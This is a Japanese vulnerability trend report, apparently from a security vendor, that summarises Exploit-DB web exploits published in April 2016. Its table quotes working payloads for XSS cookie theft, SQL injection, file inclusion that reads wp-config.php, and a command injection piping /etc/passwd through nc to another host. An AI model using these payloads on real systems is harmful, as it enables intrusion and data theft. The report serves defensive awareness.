1. 脆弱性別件数
脆弱性カテゴリ
件数
ファイルアップロード
(File Upload) 1
ローカルファイル挿入
(Local File Inclusion:LFI) 2 RFIリモートファイル挿入
(Remote File Inclusion:RFI) 2 コマンド インジェクション
(Command Injection) 2
SQL インジェクション
(SQL Injection) 5
クロスサイトスクリプティング
(Cross Site Scripting : XSS) 11
合計 23
2. 危険度別件数
危険度件数
割合
早急対応要 3 13% 高 20 87% 合計 23 100%3. 攻撃実行の難易度別件数
難易度
件数
割合
難 2 9% 中 3 13% 易 18 78% 合計 23 100%4. 主なソフトウェア別脆弱性発生件数
件数
3
3
3
2
1
1
1
2016年4月公開されたExploit-DBの分析結果、クロスサイトスクリプティング(Cross Site Scripting)の攻撃に対する脆弱性報告数が最も多かったです。分析されたクロスサイトスクリプティング(Cross Site
Scripting)の攻撃は単にスクリプトをパラメーターに挿入する形式でWeb開発をする時、パラメーターに対するセキュアコーディングを適用していたなら、簡単に防ぐことができる攻撃パターンでした。該当脆弱性が発見
されたソフトウェアを使用する管理者は、最新バージョンのアップデートおよびセキュアコーディングを行い、脆弱性にさらされないように備えなければなりません。 今月は、脆弱性報告数が最近になって最も少ない期間で
した。しかし、攻撃危険度の側では先月と比べて相変わらず危険な様子を見せてくれています。特に、SQLインジェクション(SQL Injection)攻撃と関連し、特定の関数を使用する攻撃が成功すれば、データベース
の情報を簡単に類推できるので、第2次、第3次攻撃がすぐ発生しやすい危険な脆弱性が発見されました。該当脆弱性が発見されたソフトウェアを使用する管理者はパラメーター入力値の検証をさらに厳しく実施し
て、追加的に発生する可能性があるSQLインジェクション(SQL Injection)攻撃に対して備えなければなりません。
EDB-Report
最新Web脆弱性トレンドレポート(2016.04)
2016.04.01~2016.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
サマリー
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチームソフトウェア名
ImpressCMS
Asbru Web Content Management System
Novell Service Desk
phpLiteAdmin
op5
NationBuilder
Wordpress
1 2 2 2 5 11 23 0 5 10 15 20 25脆弱性別件数
3 20危険度別分類
早急対応要 高 2 3 18攻撃実行の難易度別件数
難 中 易 3 1 1 1 1主なソフトウェア別脆弱性発生件数
Asbru Web Content Management System
NationBuilder Wordpress
EDB-Report
最新Web脆弱性トレンドレポート(2016.04)
2016.04.01~2016.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
中
:情報漏洩
するため、高度な攻撃コードを採用したパターン、知らされていない攻撃
コードを採用したパターンのいずれかに該当する
** 5件以上発生した主なソフトウェア別脆弱性の詳細情報
EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名危険度分類基準
難
:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得
既知の攻撃コードを採用したパターンのいずれかに該当する
中
:攻撃手法自体は難しくないが、迂回コードを採用したパターン
早急対応要
:攻撃が成功した場合システムへ侵入可
高
:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす
易
:1回のリクエストで攻撃が成立するパターン、複数回トライするも、
攻撃実行難易度分類基準
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2016-04-01 39646 LFI 易 高 Plugin 1.0 - admin-ajax.php LFIWordPress Advanced Video 脆弱性 /wp-admin/admin-ajax.php?action=ave_publishPost&title=1&short=rnd&ter m=rnd&thumb=../wp-config.php Wordpress WordPress Advanced Video Plugin 1.0
2016-04-05 39664 XSS 易 高 Manager Pro 8102 to 8302 -ManageEngine Password AddMail.ve XSS 脆弱性
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 service=1&serviceurl=1&loginname=1&password=<!--+-- +--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailA ccount.cc%3F ManageEngine Password Manager ManageEngine Password Manager Pro 8102 to 830 2016-04-06 39668 SQL Injection 中 高 SocialEngine 4.8.9 - SQL Injection /blogs/?category=0&end_date=&orderby=1%20AND%2 0%28SELECT%20*%20FROM%20%28SELECT%28SLEE P%28IF%28MID%28version%28%29,1,1%29%20LIKE %205,99,0%29%29%29%29MTeU%29 SocialEngine SocialEngine 4.8.
2016-04-06 39667 LFI 易 高 Management System 9.2.7 - / LFIAsbru Web Content
脆弱性 /../../../../../WEB-INF/web.xml Asbru Web Content Management System Asbru Web Content Management System 9.2. 2016-04-06 39667 RFI 易 高
Asbru Web Content Management System 9.2.7 -login_post.jsp RFI 脆弱性 /login_post.jsp?url=http://www.zeroscience.mk Asbru Web Content Management System Asbru Web Content Management System 9.2.
2016-04-06 39667 XSS 易 高 Management System 9.2.7 -Asbru Web Content create_post.jsp XSS 脆弱性
POST /webadmin/fileformats/create_post.jsp HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 filenameextension="><script>alert(document.cookie)</scri pt> Asbru Web Content Management System Asbru Web Content Management System 9.2.
2016-04-08 39676 Command Injection 中 早急対応要 op5 7.1.9 - command_test.php Command Injection 脆弱性 /monitor/op5/nacoma/command_test.php?cmd_str=/bin/ cat%20/etc/passwd%20|%20nc%20192.168.1.102%20 5555 op5 op5 7.1.9 2016-04-11 39687 File Upload 易 高
Novell Service Desk 7.1.0, 7.0.3 and 6.5 -/LiveTime/WebObjects/LiveTime. POST /LiveTime/WebObjects/LiveTime.woa/wo/7.0.53.19.0.2.7. 0.3.0.0.1 HTTP/1.1 Host:
Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2 ---7dd10029908f2 Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; Novell Service Desk Novell Service Desk 7.1.0, 7.0.3
EDB-Report
最新Web脆弱性トレンドレポート(2016.04) 2016.04.01~2016.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
EDB-Report
最新Web脆弱性トレンドレポート(2016.04)
2016.04.01~2016.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
2016-04-11 39682 XSS 易 高 Administrator 1.1.8 - index.phpRockMongo PHP MongoDB XSS 脆弱性
POST /rockmongo/index.php?action=login.index HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username="><script>alert(1)</script> RockMongo RockMongo PHP MongoDB Administrator 1.1.8 2016-04-11 39679 Command Injection 易 高 OpenCart 2.1.0.2 to 2.2.0.0 -index.php Command Injection
脆弱性 /shop_directory/index.php?route=account/edit&b=system &c=ls OpenCart OpenCart 2.1.0.2 to 2.2.0.0 2016-04-11 39687 XSS 易 高
Novell Service Desk 7.1.0, 7.0.3 and 6.5 -/LiveTime/WebObjects/LiveTime. woa/wo/ XSS 脆弱性 POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1 .3.0.1 HTTP/1.1 Host:
Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
Content-Type: multipart/form-data; boundary=---7dd10029908f2
---7dd10029908f2
Content-Disposition: form-data; name="tf_orgUnitName" "><script>alert(1)</script> ---7dd10029908f2--Novell Service Desk Novell Service Desk 7.1.0, 7.0.3 and 6.5 2016-04-12 39688 RFI 易 高 Ovidentia troubleticketsModule 7.6 - statistique_evolution.php RFI 脆弱性 /troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstal lPath]=http://hack.com Ovidentia Ovidentia troubleticketsMo dule 7.6
2016-04-14 39697 XSS 易 高 PHPmongoDB 1.0.0 - index.phpXSS 脆弱性 /phpmongodb/index.php/%22%3E%3Ciframe%20src=http://www.phpmongodb.org%3E PHPmongoDB PHPmongoDB1.0.0
2016-04-18 39705 XSS 易 高
WordPress Kento Post View Counter Plugin 2.8 - admin.php
XSS 脆弱性
POST /wp-admin/admin.php?page=kentopvc_settings HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 kento_pvc_today_text="<script>alert(1);</script><img src="b Wordpress WordPress Kento Post View Counter Plugin 2.
2016-04-18 39704 XSS 易 高 WordPress leenk.me Plugin 2.5.0 - admin.php XSS 脆弱性
POST
/wp/wp-admin/admin.php?page=leenkme_facebook HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 facebook_description=%3C%2Ftextarea%3E%3Cscript %3Eprompt%28%29%3B%3C%2Fscript%3E Wordpress WordPress leenk.me Plugin 2.5.0 2016-04-19 39710 SQL Injection 易 高 modified eCommerce Shopsoftware 2.0.0.0 rev 9678 -easybillcsv.php SQL Injection 脆 弱性 /shop/api/easybill/easybillcsv.php?token=MODULE_EASYBIL L_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23 modified eCommerce Shopsoftware modified eCommerce Shopsoftware 2.0.0.0 rev 9678 2016-04-20 39711 SQL Injection 難 早急対応要 PHPBack 1.3.0 - /phpback-1.3.0/admin/ideas SQL Injection 脆弱性 POST /phpback-1.3.0/admin/ideas HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
search=1&orderby=title,extractvalue(0x0a,concat(0x0a,(se lect USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION())))
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
EDB-Report
最新Web脆弱性トレンドレポート(2016.04) 2016.04.01~2016.04.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 2016-04-21 39714 XSS 易 高 phpLiteAdmin 1.9.6 -phpliteadmin.php XSS 脆弱性 POST /phpliteadmin/phpliteadmin.php?action=table_create&co nfirm=1 HTTP/1.1 Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 tablename=testtable&rows=2&0_field=id&0_type=INTEG ER&0_defaultoption=defined"><script>alert(1)</script>&0 _defaultvalue=1&1_field=name&1_type=INTEGER&1_def aultoption=defined&1_defaultvalue=test phpLiteAdmin phpLiteAdmin 1.9.6 2016-04-25 39730 XSS 易 高 /admin/signups/2/ XSS 脆弱性NationBuilder -POST /admin/signups/2/background?screen=signup-header HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 signup[note]=<script>alert(onfirm(document.cookie)</scri pt> NationBuilder NationBuilder 2016-04-25 39730 XSS 易 高 /admin/sites/1/tags XSS 脆弱性NationBuilder -POST /admin/sites/1/tags HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 page_tag[name]=<script>confirm(document.cookie)</scri pt> NationBuilder NationBuilder 2016-04-25 39730 XSS 易 高 /admin/sites/1/pages/ XSS 脆弱NationBuilder -性 POST /admin/sites/1/pages/12?screen=seo HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 page[headline]=Volunteer<script>confirm(document.cook ie)</script> NationBuilder NationBuilder
2016-04-26 39737 SQL Injection 中 高 ImpressCMS 1.3.9 - field.php SQL Injection 脆弱性
POST /modules/profile/admin/field.php HTTP/1.1 Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM (SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE 'DhUh&button_quicksearch_mod_profile_Field=Search&fil tersel=default&limitsel=15 ImpressCMS ImpressCMS 1.3.9 /ajax/getDropdownConnect.php?fromtype=Computer&ite mtype=Computer&page=1&page_limit=1%20PROCEDURE %20analyse%28%28select%20extractvalue%28rand%28%29 ,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29 %20LIKE%205,%20BENCHMARK%285000000,SHA1%281%2 9%29,1%29%29%29%29%29,1%29
GLPi 0.90.2 - getDropdownConnect.php SQL Injection 脆弱性早急対応要 難
SQL Injection 39751
